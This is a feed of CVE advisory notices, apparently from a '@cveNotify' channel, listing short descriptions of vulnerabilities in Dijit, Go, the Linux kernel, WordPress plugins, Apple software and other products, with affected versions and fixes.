🚨 CVE-2020-4051In Dijit before versions 1.11.11, and greater than or equal to 1.12.0 and less than 1.12.9, and greater than or equal to 1.13.0 and less than 1.13.8, and greater than or equal to 1.14.0 and less than 1.14.7, and greater than or equal to 1.15.0 and less than 1.15.4, and greater than or equal to 1.16.0 and less than 1.16.3, there is a cross-site scripting vulnerability in the Editor's LinkDialog plugin. This has been fixed in 1.11.11, 1.12.9, 1.13.8, 1.14.7, 1.15.4, 1.16.3.🎖@cveNotify |
|
| 2023-02-28 19:30:01 |
🚨 CVE-2019-14744In KDE Frameworks KConfig before 5.61.0, malicious desktop files and configuration files lead to code execution with minimal user interaction. This relates to libKF5ConfigCore.so, and the mishandling of .desktop and .directory files, as demonstrated by a shell command on an Icon line in a .desktop file.🎖@cveNotify |
|
| 2023-02-28 19:30:00 |
🚨 CVE-2022-41722A path traversal vulnerability exists in filepath.Clean on Windows. On Windows, the filepath.Clean function could transform an invalid path such as "a/../c:/b" into the valid path "c:\b". This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. After fix, the filepath.Clean function transforms this path into the relative (but still invalid) path ".\c:\b".🎖@cveNotify |
|
| 2023-02-28 19:29:59 |
🚨 CVE-2022-41723A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.🎖@cveNotify |
|
| 2023-02-28 19:29:57 |
🚨 CVE-2022-41724Large handshake records may cause panics in crypto/tls. Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses. This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).🎖@cveNotify |
|
| 2023-02-28 19:29:56 |
🚨 CVE-2022-41725A denial of service is possible from excessive resource consumption in net/http and mime/multipart. Multipart form parsing with mime/multipart.Reader.ReadForm can consume largely unlimited amounts of memory and disk files. This also affects form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue. ReadForm takes a maxMemory parameter, and is documented as storing "up to maxMemory bytes +10MB (reserved for non-file parts) in memory". File parts which cannot be stored in memory are stored on disk in temporary files. The unconfigurable 10MB reserved for non-file parts is excessively large and can potentially open a denial of service vector on its own. However, ReadForm did not properly account for all memory consumed by a parsed form, such as map entry overhead, part names, and MIME headers, permitting a maliciously crafted form to consume well over 10MB. In addition, ReadForm contained no limit on the number of disk files created, permitting a relatively small request body to create a large number of disk temporary files. With fix, ReadForm now properly accounts for various forms of memory overhead, and should now stay within its documented limit of 10MB + maxMemory bytes of memory consumption. Users should still be aware that this limit is high and may still be hazardous. In addition, ReadForm now creates at most one on-disk temporary file, combining multiple form parts into a single temporary file. The mime/multipart.File interface type's documentation states, "If stored on disk, the File's underlying concrete type will be an *os.File.". This is no longer the case when a form contains more than one file part, due to this coalescing of parts into a single file. The previous behavior of using distinct files for each form part may be reenabled with the environment variable GODEBUG=multipartfiles=distinct. Users should be aware that multipart.ReadForm and the http.Request methods that call it do not limit the amount of disk consumed by temporary files. Callers can limit the size of form data with http.MaxBytesReader.🎖@cveNotify |
|
| 2023-02-28 19:29:55 |
🚨 CVE-2022-41727An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.🎖@cveNotify |
|
| 2023-02-28 19:29:54 |
🚨 CVE-2023-1018An out-of-bounds read vulnerability exists in TPM2.0's Module Library allowing a 2-byte read past the end of a TPM2.0 command in the CryptParameterDecryption routine. An attacker who can successfully exploit this vulnerability can read or access sensitive data stored in the TPM.🎖@cveNotify |
|
| 2023-02-28 19:29:53 |
🚨 CVE-2023-25431An issue was discovered in Online Reviewer Management System v1.0. There is a XSS vulnerability via reviewer_0/admins/assessments/course/course-update.php.🎖@cveNotify |
|
| 2023-02-28 19:29:52 |
🚨 CVE-2023-25432An issue was discovered in Online Reviewer Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via reviewer_0/admins/assessments/course/course-update.php.🎖@cveNotify |
|
| 2023-02-28 19:29:50 |
🚨 CVE-2023-27320Sudo before 1.9.13p2 has a double free in the per-command chroot feature.🎖@cveNotify |
|
| 2023-02-28 19:29:49 |
🚨 CVE-2016-15005CSRF tokens are generated using math/rand, which is not a cryptographically secure random number generator, allowing an attacker to predict values and bypass CSRF protections with relatively few requests.🎖@cveNotify |
|
| 2023-02-28 19:29:48 |
🚨 CVE-2018-3717connect node module before 2.14.0 suffers from a Cross-Site Scripting (XSS) vulnerability due to a lack of validation of file in directory.js middleware.🎖@cveNotify |
|
| 2023-02-28 19:29:47 |
🚨 CVE-2018-3718serve node module suffers from Improper Handling of URL Encoding by permitting access to ignored files if a filename is URL encoded.🎖@cveNotify |
|
| 2023-02-28 19:29:45 |
🚨 CVE-2018-3714node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path.🎖@cveNotify |
|
| 2023-02-28 19:29:44 |
🚨 CVE-2021-33226Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file.🎖@cveNotify |
|
| 2023-02-28 19:29:43 |
🚨 CVE-2018-3713angular-http-server node module suffers from a Path Traversal vulnerability due to lack of validation of possibleFilename, which allows a malicious user to read content of any file with known path.🎖@cveNotify |
|
| 2023-02-28 19:29:42 |
🚨 CVE-2018-3711Fastify node module before 0.38.0 is vulnerable to a denial-of-service attack by sending a request with "Content-Type: application/json" and a very large payload.🎖@cveNotify |
|
| 2023-02-28 17:30:12 |
🚨 CVE-2023-0461There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege. There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege. We recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c🎖@cveNotify |
|
| 2023-02-28 17:30:11 |
🚨 CVE-2021-33391An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c.🎖@cveNotify |
|
| 2023-02-28 17:30:10 |
🚨 CVE-2022-20803A vulnerability in the OLE2 file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device.The vulnerability is due to incorrect use of the realloc function that may result in a double-free. An attacker could exploit this vulnerability by submitting a crafted OLE2 file to be scanned by ClamAV on the affected device. An exploit could allow the attacker to cause the ClamAV scanning process to crash, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-02-28 17:30:08 |
🚨 CVE-2019-12523An issue was discovered in Squid before 4.9. When handling a URN request, a corresponding HTTP request is made. This HTTP request doesn't go through the access checks that incoming HTTP requests go through. This causes all access checks to be bypassed and allows access to restricted HTTP servers, e.g., an attacker can connect to HTTP servers that only listen on localhost.🎖@cveNotify |
|
| 2023-02-28 17:30:07 |
🚨 CVE-2019-12422Apache Shiro before 1.4.2, when using the default "remember me" configuration, cookies could be susceptible to a padding attack.🎖@cveNotify |
|
| 2023-02-28 17:30:06 |
🚨 CVE-2023-24044** DISPUTED ** A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature."🎖@cveNotify |
|
| 2023-02-28 17:30:05 |
🚨 CVE-2023-24785An issue in Giorgio Tani peazip v.9.0.0 allows attackers to cause a denial of service via the End of Archive tag function of the peazip/pea UNPEA feature.🎖@cveNotify |
|
| 2023-02-28 17:30:04 |
🚨 CVE-2019-17533Mat_VarReadNextInfo4 in mat4.c in MATIO 1.5.17 omits a certain '\0' character, leading to a heap-based buffer over-read in strdup_vprintf when uninitialized memory is accessed.🎖@cveNotify |
|
| 2023-02-28 17:30:02 |
🚨 CVE-2023-26020Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Crafter Studio on Linux, MacOS, Windows, x86, ARM, 64 bit allows SQL Injection.This issue affects CrafterCMS v4.0 from 4.0.0 through 4.0.1, and v3.1 from 3.1.0 through 3.1.26.🎖@cveNotify |
|
| 2023-02-28 17:30:01 |
🚨 CVE-2018-16981stb stb_image.h 2.19, as used in catimg, Emscripten, and other products, has a heap-based buffer overflow in the stbi__out_gif_code function.🎖@cveNotify |
|
| 2023-02-28 17:30:00 |
🚨 CVE-2018-25012A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE24().🎖@cveNotify |
|
| 2023-02-28 17:29:59 |
🚨 CVE-2019-9918An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla!. Input does not get validated and queries are not written in a way to prevent SQL injection. Therefore arbitrary SQL-Statements can be executed in the database.🎖@cveNotify |
|
| 2023-02-28 17:29:58 |
🚨 CVE-2017-5546The freelist-randomization feature in mm/slab.c in the Linux kernel 4.8.x and 4.9.x before 4.9.5 allows local users to cause a denial of service (duplicate freelist entries and system crash) or possibly have unspecified other impact in opportunistic circumstances by leveraging the selection of a large value for a random number.🎖@cveNotify |
|
| 2023-02-28 17:29:57 |
🚨 CVE-2021-37373** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Slice 1st generation firmware 7.3.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2023-02-28 17:29:56 |
🚨 CVE-2022-2873An out-of-bounds memory access flaw was found in the Linux kernel Intel’s iSMT SMBus host controller driver in the way a user triggers the I2C_SMBUS_BLOCK_DATA (with the ioctl I2C_SMBUS) with malicious input data. This flaw allows a local user to crash the system.🎖@cveNotify |
|
| 2023-02-28 17:29:52 |
🚨 CVE-2013-4843Unspecified vulnerability in HP Integrated Lights-Out 4 (iLO4) with firmware before 1.32 allows remote authenticated users to obtain sensitive information via unknown vectors.🎖@cveNotify |
|
| 2023-02-28 17:29:51 |
🚨 CVE-2022-2318There are use-after-free vulnerabilities caused by timer handler in net/rose/rose_timer.c of linux that allow attackers to crash linux kernel without any privileges.🎖@cveNotify |
|
| 2023-02-28 17:29:50 |
🚨 CVE-2022-27778A use of incorrectly resolved name vulnerability fixed in 7.83.1 might remove the wrong file when `--no-clobber` is used together with `--remove-on-error`.🎖@cveNotify |
|
| 2023-02-28 17:29:49 |
🚨 CVE-2022-3649A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.🎖@cveNotify |
|
| 2023-02-28 17:29:48 |
🚨 CVE-2022-1973A use-after-free flaw was found in the Linux kernel in log_replay in fs/ntfs3/fslog.c in the NTFS journal. This flaw allows a local attacker to crash the system and leads to a kernel information leak problem.🎖@cveNotify |
|
| 2023-02-28 16:29:55 |
🚨 CVE-2019-16056An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.🎖@cveNotify |
|
| 2023-02-28 16:29:51 |
🚨 CVE-2022-0637There was an open redirection vulnerability pollbot, which was used in https://pollbot.services.mozilla.com/ and https://pollbot.stage.mozaws.net/ An attacker could have redirected anyone to malicious sites.🎖@cveNotify |
|
| 2023-02-28 16:29:50 |
🚨 CVE-2023-1022The WP Meta SEO plugin for WordPress is vulnerable to unauthorized options update due to a missing capability check on the wpmsGGSaveInformation function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to update google analytics options maintained by the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-02-28 16:29:49 |
🚨 CVE-2023-1023The WP Meta SEO plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the saveSitemapSettings function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to change sitemap-related settings of the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-02-28 16:29:46 |
🚨 CVE-2023-1024The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the regenerateSitemaps function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to generate sitemaps. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-02-28 16:29:45 |
🚨 CVE-2023-1027The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the checkAllCategoryInSitemap function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to obtain post categories. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.🎖@cveNotify |
|
| 2023-02-28 16:29:44 |
🚨 CVE-2023-1080The GN Publisher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-02-28 16:29:40 |
🚨 CVE-2020-36652Incorrect Default Permissions vulnerability in Hitachi Automation Director on Linux, Hitachi Infrastructure Analytics Advisor on Linux (Hitachi Infrastructure Analytics Advisor, Analytics probe server components), Hitachi Ops Center Automator on Linux, Hitachi Ops Center Analyzer on Linux (Hitachi Ops Center Analyzer, Analyzer probe server components), Hitachi Ops Center Viewpoint on Linux (Viewpoint RAID Agent component) allows local users to read and write specific files. This issue affects Hitachi Automation Director: from 8.2.0-00 through 10.6.1-00; Hitachi Infrastructure Analytics Advisor: from 2.0.0-00 through 4.0.0-00; Hitachi Ops Center Automator: before 10.9.1-00; Hitachi Ops Center Analyzer: before 10.9.1-00; Hitachi Ops Center Viewpoint: before 10.9.1-00.🎖@cveNotify |
|
| 2023-02-28 16:29:39 |
🚨 CVE-2022-4895Improper Certificate Validation vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Analytics probe component), Hitachi Ops Center Analyzer on Linux (Analyzer probe component) allows Man in the Middle Attack.This issue affects Hitachi Infrastructure Analytics Advisor: from 2.0.0-00 through 4.4.0-00; Hitachi Ops Center Analyzer: from 10.0.0-00 before 10.9.1-00.🎖@cveNotify |
|
| 2023-02-28 16:29:38 |
🚨 CVE-2021-22283Improper Initialization vulnerability in ABB Relion protection relays - 611 series, ABB Relion protection relays - 615 series IEC 4.0 FP1, ABB Relion protection relays - 615 series CN 4.0 FP1, ABB Relion protection relays - 615 series IEC 5.0, ABB Relion protection relays - 615 series IEC 5.0 FP1, ABB Relion protection relays - 620 series IEC/CN 2.0, ABB Relion protection relays - 620 series IEC/CN 2.0 FP1, ABB Relion protection relays - REX640 PCL1, ABB Relion protection relays - REX640 PCL2, ABB Relion protection relays - REX640 PCL3, ABB Relion protection relays - RER615, ABB Remote Monitoring and Control - REC615, ABB Merging Unit- SMU615 allows Communication Channel Manipulation.This issue affects Relion protection relays - 611 series: from 1.0.0 before 2.0.3; Relion protection relays - 615 series IEC 4.0 FP1: from 4.1.0 before 4.1.9; Relion protection relays - 615 series CN 4.0 FP1: from 4.1.0 before 4.1.8; Relion protection relays - 615 series IEC 5.0: from 5.0.0 before 5.0.12; Relion protection relays - 615 series IEC 5.0 FP1: from 5.1.0 before 5.1.20; Relion protection relays - 620 series IEC/CN 2.0: from 2.0.0 before 2.0.11; Relion protection relays - 620 series IEC/CN 2.0 FP1: from 2.1.0 before 2.1.15; Relion protection relays - REX640 PCL1: from 1.0.0 before 1.0.8; Relion protection relays - REX640 PCL2: from 1.1.0 before 1.1.4; Relion protection relays - REX640 PCL3: from 1.2.0 before 1.2.1; Relion protection relays - RER615: from 2.0.0 before 2.0.3; Remote Monitoring and Control - REC615: from 1.0.0 before 2.0.3; Merging Unit- SMU615: from 1.0.0 before 1.0.2.🎖@cveNotify |
|
| 2023-02-28 12:30:46 |
🚨 CVE-2023-26609ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.🎖@cveNotify |
|
| 2023-02-28 12:30:45 |
🚨 CVE-2023-26602ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.🎖@cveNotify |
|
| 2023-02-28 07:31:04 |
🚨 CVE-2023-26235JD-GUI 1.6.6 allows XSS via util/net/InterProcessCommunicationUtil.java.🎖@cveNotify |
|
| 2023-02-28 07:31:03 |
🚨 CVE-2022-4385The Intuitive Custom Post Order WordPress plugin before 3.1.4 does not check for authorization in the update-menu-order ajax action, allowing any logged in user (with roles as low as Subscriber) to update the menu order🎖@cveNotify |
|
| 2023-02-28 07:31:02 |
🚨 CVE-2022-4386The Intuitive Custom Post Order WordPress plugin before 3.1.4 lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack🎖@cveNotify |
|
| 2023-02-28 07:30:58 |
🚨 CVE-2023-0929Use after free in Vulkan in Google Chrome prior to 110.0.5481.177 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-02-28 07:30:57 |
🚨 CVE-2023-0932Use after free in WebRTC in Google Chrome on Windows prior to 110.0.5481.177 allowed a remote attacker who convinced the user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-02-28 07:30:53 |
🚨 CVE-2023-0933Integer overflow in PDF in Google Chrome prior to 110.0.5481.177 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-02-28 07:30:52 |
🚨 CVE-2023-0966A vulnerability classified as problematic was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file admin/?page=orders/view_order. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221635.🎖@cveNotify |
|
| 2023-02-28 07:30:51 |
🚨 CVE-2023-0429The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-02-28 07:30:47 |
🚨 CVE-2023-0380The Easy Digital Downloads WordPress plugin before 3.1.0.5 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-28 07:30:46 |
🚨 CVE-2023-0428The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-02-28 02:29:36 |
🚨 CVE-2015-10086A vulnerability, which was classified as critical, was found in OpenCycleCompass server-php. Affected is an unknown function of the file api1/login.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is fa0d9bcf81c711a88172ad0d37a842f029ac3782. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221808.🎖@cveNotify |
|
| 2023-02-27 23:29:36 |
🚨 CVE-2023-24258SPIP v4.1.5 and earlier was discovered to contain a SQL injection vulnerability via the _oups parameter. This vulnerability allows attackers to execute arbitrary code via a crafted POST request.🎖@cveNotify |
|
| 2023-02-27 23:29:35 |
🚨 CVE-2023-26043GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.🎖@cveNotify |
|
| 2023-02-27 22:29:58 |
🚨 CVE-2020-9846A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs.🎖@cveNotify |
|
| 2023-02-27 22:29:57 |
🚨 CVE-2022-46712A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13. An app may be able to cause unexpected system termination or potentially execute code with kernel privileges.🎖@cveNotify |
|
| 2023-02-27 22:29:56 |
🚨 CVE-2021-46841This issue was addressed by using HTTPS when sending information over the network. This issue is fixed in Apple Music 3.5.0 for Android. An attacker in a privileged network position can track a user's activity.🎖@cveNotify |
|
| 2023-02-27 22:29:55 |
🚨 CVE-2022-22668A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A malicious application may be able to leak sensitive user information.🎖@cveNotify |
|
| 2023-02-27 22:29:54 |
🚨 CVE-2022-32846A logic issue was addressed with improved state management. This issue is fixed in Apple Music 3.9.10 for Android. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-02-27 22:29:52 |
🚨 CVE-2022-32836This issue was addressed with improved state management. This issue is fixed in Apple Music 3.9.10 for Android. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-02-27 22:29:51 |
🚨 CVE-2022-32902A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13, macOS Monterey 12.6, macOS Big Sur 11.7. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-02-27 22:29:50 |
🚨 CVE-2022-32855A logic issue was addressed with improved state management. This issue is fixed in iOS 15.6 and iPadOS 15.6. A user may be able to view restricted content from the lock screen.🎖@cveNotify |
|
| 2023-02-27 22:29:49 |
🚨 CVE-2022-32891The issue was addressed with improved UI handling. This issue is fixed in Safari 16, tvOS 16, watchOS 9, iOS 16. Visiting a website that frames malicious content may lead to UI spoofing.🎖@cveNotify |
|
| 2023-02-27 22:29:48 |
🚨 CVE-2022-32896This issue was addressed by enabling hardened runtime. This issue is fixed in macOS Monterey 12.6, macOS Big Sur 11.7. A user may be able to view sensitive user information.🎖@cveNotify |
|
| 2023-02-27 22:29:47 |
🚨 CVE-2022-32900A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.6, macOS Big Sur 11.7. An app may be able to gain elevated privileges.🎖@cveNotify |
|
| 2023-02-27 22:29:46 |
🚨 CVE-2022-32949This issue was addressed with improved checks. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, tvOS 16. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-02-27 22:29:45 |
🚨 CVE-2022-42797An injection issue was addressed with improved input validation. This issue is fixed in Xcode 14.1. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-02-27 22:29:44 |
🚨 CVE-2022-46713A race condition was addressed with additional validation. This issue is fixed in macOS Ventura 13, macOS Monterey 12.6.1, macOS Big Sur 11.7.1. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-02-27 22:29:43 |
🚨 CVE-2022-46704A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-02-27 22:29:39 |
🚨 CVE-2023-23496The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.2, tvOS 16.3, Safari 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-02-27 22:29:38 |
🚨 CVE-2022-46723This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.1, macOS Big Sur 11.7.1. A remote user may be able to write arbitrary files.🎖@cveNotify |
|
| 2023-02-27 22:29:37 |
🚨 CVE-2023-23501The issue was addressed with improved memory handling This issue is fixed in macOS Ventura 13.2. An app may be able to disclose kernel memory..🎖@cveNotify |
|
| 2023-02-27 22:29:36 |
🚨 CVE-2023-23502An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in macOS Ventura 13.2, macOS Monterey 12.6.3, tvOS 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3. An app may be able to determine kernel memory layout.🎖@cveNotify |
|
| 2023-02-27 18:29:57 |
🚨 CVE-2019-13575A SQL injection vulnerability exists in WPEverest Everest Forms plugin for WordPress through 1.4.9. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via includes/evf-entry-functions.php🎖@cveNotify |
|
| 2023-02-27 18:29:56 |
🚨 CVE-2019-0179Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-27 18:29:52 |
🚨 CVE-2019-0177Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-27 18:29:51 |
🚨 CVE-2019-0180Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-02-27 18:29:50 |
🚨 CVE-2019-11766dhcp6.c in dhcpcd before 6.11.7 and 7.x before 7.2.2 has a buffer over-read in the D6_OPTION_PD_EXCLUDE feature.🎖@cveNotify |
|
| 2023-02-27 18:29:46 |
🚨 CVE-2023-0535The Donation Block For PayPal WordPress plugin before 2.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-27 18:29:45 |
🚨 CVE-2023-0543The Arigato Autoresponder and Newsletter WordPress plugin before 2.1.7.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-02-27 18:29:41 |
🚨 CVE-2023-23157A stored cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fullname parameter on the enquiry page.🎖@cveNotify |
|
| 2023-02-27 18:29:40 |
🚨 CVE-2022-4757The List Pages Shortcode WordPress plugin before 1.7.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-27 16:29:48 |
🚨 CVE-2023-23108In crasm 1.8-3, invalid input validation, specific files passed to the command line application, can lead to a NULL pointer dereference in the function Xasc.🎖@cveNotify |
|
| 2023-02-27 16:29:47 |
🚨 CVE-2023-23109In crasm 1.8-3, invalid input validation, specific files passed to the command line application, can lead to a divide by zero fault in the function opdiv.🎖@cveNotify |
|
| 2023-02-27 16:29:46 |
🚨 CVE-2023-22945In the GrowthExperiments extension for MediaWiki through 1.39, the growthmanagementorlist API allows blocked users (blocked in ApiManageMentorList) to enroll as mentors or edit any of their mentorship-related properties.🎖@cveNotify |
|
| 2023-02-27 16:29:45 |
🚨 CVE-2022-4422This issue affects: Bulutses Bilgi Teknolojileri LTD. ?T?. BULUTDESK CALLCENTER versions prior to 3.0.🎖@cveNotify |
|
| 2023-02-27 16:29:44 |
🚨 CVE-2023-22909An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow.🎖@cveNotify |
|
| 2023-02-27 16:29:42 |
🚨 CVE-2023-22911An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. E-Widgets does widget replacement in HTML attributes, which can lead to XSS, because widget authors often do not expect that their widget is executed in an HTML attribute context.🎖@cveNotify |
|
| 2023-02-27 16:29:41 |
🚨 CVE-2022-34908An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It possesses an authentication mechanism; however, some features do not require any token or cookie in a request. Therefore, an attacker may send a simple HTTP request to the right endpoint, and obtain authorization to retrieve application data.🎖@cveNotify |
|
| 2023-02-27 16:29:40 |
🚨 CVE-2022-34909An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It allows SQL Injection, by which an attacker can bypass authentication and retrieve data that is stored in the database.🎖@cveNotify |
|
| 2023-02-27 16:29:39 |
🚨 CVE-2022-34910An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It uses a local database to store data and accounts. However, the password is stored in cleartext. Therefore, an attacker can retrieve the passwords of other users that used the same device.🎖@cveNotify |
|
| 2023-02-27 16:29:38 |
🚨 CVE-2023-24206Davinci v0.3.0-rc was discovered to contain a SQL injection vulnerability via the copyDisplay function.🎖@cveNotify |
|
| 2023-02-27 13:29:54 |
🚨 CVE-2023-1053A vulnerability was found in SourceCodester Music Gallery Site 1.0 and classified as critical. This issue affects some unknown processing of the file view_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-221819.🎖@cveNotify |
|
| 2023-02-27 13:29:53 |
